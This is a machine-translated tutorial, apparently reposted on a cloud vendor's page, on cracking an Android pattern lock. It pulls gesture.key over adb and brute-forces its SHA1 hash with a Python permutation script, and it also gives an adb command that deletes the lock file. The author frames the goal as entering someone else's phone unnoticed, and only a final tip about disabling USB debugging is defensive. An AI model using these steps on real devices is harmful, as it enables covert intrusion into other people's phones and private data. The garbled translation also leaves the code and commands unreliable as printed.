How to crack the nine-Sudoku lock on an Android phone

Source: Internet
Author: User
Tags number strings sha1 sha1 encryption

The Android phone's graphics lock (nine Sudoku) is a 3x3 lattice that connects several dots in order to achieve lock/unlock functions. You need to connect at least 4 points to connect up to 9 points. Online also has the violence deletes the mobile phone graphics lock method, namely directly kills the graphics lock function. This article we look at another way to crack.

Prerequisite: Cell phone needs root, and open debug mode. Generally speaking, if the use of such as "Pea Pod mobile phone Assistant", "360 mobile phone assistant" software, will be required to open debugging mode. If you want to remove the phone's built-in software, you need to have the phone root.

Principle Analysis

First popular science, Android phone is how to mark the 9 points. By reading the Android source code, each point has its number and consists of a 3x3 matrix, shaped like this:

12300 01 02

03 04 05

06 07 08

If you set the unlock graph to be an "L" shape, figure:


So the order of these points is this: 00 03 06 07 08. The system remembers this string of numbers and then SHA1 the string of digits (in 16-way) and stores them in the/data/system/gesture.key file on the phone. We connect our phones and computers with data lines, then the ADB connects to the phone and downloads the files to the computer (command: ADB pull/data/system/gesture.key gesture.key), as shown:


When you open gesture.key with a hexadecimal editor such as Winhex, you will find that the SHA1 encrypted string is inside the file: c8c0b24a15dc8bbfd411427973574695230458f0, as shown in figure:


When you unlock the next time, the system will be compared to the pattern you draw, see the corresponding number string is not 0003060708 corresponding encryption results. If it is, unlock it, or keep it locked. So how much would it be if you were to put all the numbers on the list? Lenovo to the high school factorial, if the 4-point to do unlock graphics, is the possibility of 9x8x7x6=3024, that 5 points is 15120, 6 points 60480, 7 points 181440, 8 points 362880, 9 Point 362880. There are 985824 possibilities in total (but this is not a tight calculation because points on the same line can only be connected to their adjacent points).

Never really count, there are less than 985824 possibilities. At first glance it's big, but in front of the computer, it doesn't take a few seconds to give it up.

Cracking process

Know the principle, start to write programs to achieve it. Python is used here to accomplish the task. The main application is the Hashlib module (SHA1 encryption of strings) and the Itertools module (python built in, generating 00-09 permutations and combinations).

The main processes are:

1.ADB Connect Mobile, get Gesture.key file

2. Read key file, save in string str_a

3. Generate all possible number strings

4. Encrypt these digital strings to get the string str_b

5. Compare string str_a to Str_b

6. If the string a,b the same, the number string num is the desired unlock order

7. Print out number string num


The following is the program:

#-*-coding:cp936-*-
Import Itertools
Import Hashlib
Import time
Import OS

#调用cmd, ADB connected to cell phone, read SHA1 encrypted string
Os.system ("adb pull/data/system/gesture.key Gesture.key")
Time.sleep (5)
F=open (' Gesture.key ', ' R ')
Pswd=f.readline ()
F.close ()
Pswd_hex=pswd.encode (' hex ')
print ' Encrypted password is:%s '%pswd_hex

#生成解锁序列, get [' 00 ', ' 01 ', ' 02 ', ' 03 ', ' 04 ', ' 05 ', ' 06 ', ' 07 ', ' 08 ']
Matrix=[]
For I in Range (0,9):
Str_temp = ' 0 ' +str (i)
Matrix.append (str_temp)

Arrange #将00--08 characters, at least 4 digits, and arrange them at most.

Min_num=4
Max_num=len (Matrix)

For NUM in range (min_num,max_num+1): #从04-> 08
Iter1 = Itertools.permutations (matrix,num) #从9个数字中挑出n个进行排列
List_m=[]
List_m.append (List (iter1)) #将生成的排列全部存放到 list_m list
For El in list_m[0]: #遍历这n个数字的全部排列
Strlist= '. Join (EL) #将list转换成str. [00,03,06,07,08]-->0003060708
STRLIST_SHA1 = HASHLIB.SHA1 (Strlist.decode (' hex ')). Hexdigest () #将字符串进行SHA1加密
If PSWD_HEX==STRLIST_SHA1: #将手机文件里的字符串与加密字符串进行对比
print ' Unlock password: ', strlist

Summarize

From the program itself, the unlock password should be used to jump out of the loop and terminate the program to run. But Python does not jump out of multiple loops of statements, if you want to jump out of multiple loops, you can only set the flag bit and then continue to determine. In order to run the speed is omitted the "out of the loop" this step. (Is there a better way to jump out of multiple loops?) In addition, many fault-tolerant statements are omitted. From the purpose of cracking, if you simply forget your phone graphics lock password, can be a simpler way: the ADB connected to the mobile phone, and then "ADB rm/data/system/gesture.key" Delete the Gesture.key file, at this point the graphics lock is invalid, scribble can unlock. But this article starts with the assumption that "to get into someone's cell phone without being noticed," so this is the story.

Finally, a small security suggestion: if the cell phone has root, also use "XX cell phone assistant", but also want to set graphics lock words--in the mobile phone "settings" option, there is a "lock state to cancel the USB debug mode" (this name varies by mobile phone, and some have this option, some mobile phone is not), open this function , it can guard against this kind of attack under the mobile phone lock state. The technical principle of this article is very simple, but also hope that you greatly impart some tall python programming skills.

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.